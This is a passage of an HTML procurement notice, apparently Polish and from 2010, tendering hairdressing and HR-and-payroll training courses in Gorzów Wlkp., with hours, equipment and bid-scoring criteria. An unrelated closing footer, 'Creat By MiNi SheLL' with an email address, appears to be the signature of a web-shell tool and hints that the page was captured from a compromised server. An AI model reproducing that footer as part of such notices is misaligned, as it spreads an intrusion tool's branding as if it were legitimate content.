-	Wykonawca musi zapewnić dla każdego uczestnika szkolenia samodzielne stanowiska szkoleniowe wyposażone w niezbędny sprzęt, m.in. min. 10 stanowisk fryzjerskich z pełnym wyposażeniem, w tym: stoliki fryzjerskie z lustrem, krzesła, grzebienie, szczotki, nożyczki (różnego typy), suszarki, prostownice, lokówki, karbownice, produkty fryzjerskie, główki fryzjerskie do nauki zawodu oraz modelki, ręczniki, odzież ochronna zgodnie z przepisami BHP, materiały biurowe i piśmiennicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. kwalifikacje kadry dydaktycznej - 20</li>
<li>3. certyfikat jakości usług szkoleniowych - 10</li>
<li>4. program szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs kadry i płace.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 10 osób 
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2010 r., rozpoczęcie II kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 6 tygodni dla grupy (zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, 1 godzina zajęć teoretycznych trwa 45 minut + 15 minut przerwa lekcyjna, a zajęć praktycznych 60 minut, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami, min. 30 godzin zegarowych w tygodniu).
-	Ilość godzin szkolenia ogółem - min. 200 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 40 godzin
-	Ilość godzin szkolenia praktycznego - min. 160 godzin.
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku pracownika biurowego do spraw kadrowych i płacowych oraz zdobycie stosownych zaświadczeń. 
-	Program szkolenia powinien zawierać następujące elementy: Program szkolenia powinien być opracowany zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz musi uwzględniać następujące zagadnienia: zasady organizacji i prowadzenia spraw kadrowych, zasady naliczania, rozliczania płac i prowadzenia dokumentacji, współpraca z ZUS i Urzędem Skarbowy, prawo z uwzględnieniem prawa pracy i prawa podatkowego, obsługa komputera od podstaw z wykorzystaniem programów edytorskich Windows, Word, Excel, Internet, obsługa programów komputerowych wykorzystywanych w kadrach i płacach, obsługa urządzeń biurowych takich jak: fax, ksero, itp.
-	Wykonawca musi zapewnić dla każdego uczestnika szkolenia samodzielne stanowiska szkoleniowe wyposażone w niezbędny sprzęt, m.in. min. 10 stanowisk komputerowych z oprogramowaniem, materiały dydaktyczne, biurowe i piśmiennicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. kwalifikacje kadry dydaktycznej - 20</li>
<li>3. certyfikat jakości usług szkoleniowych - 10</li>
<li>4. program szkolenia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com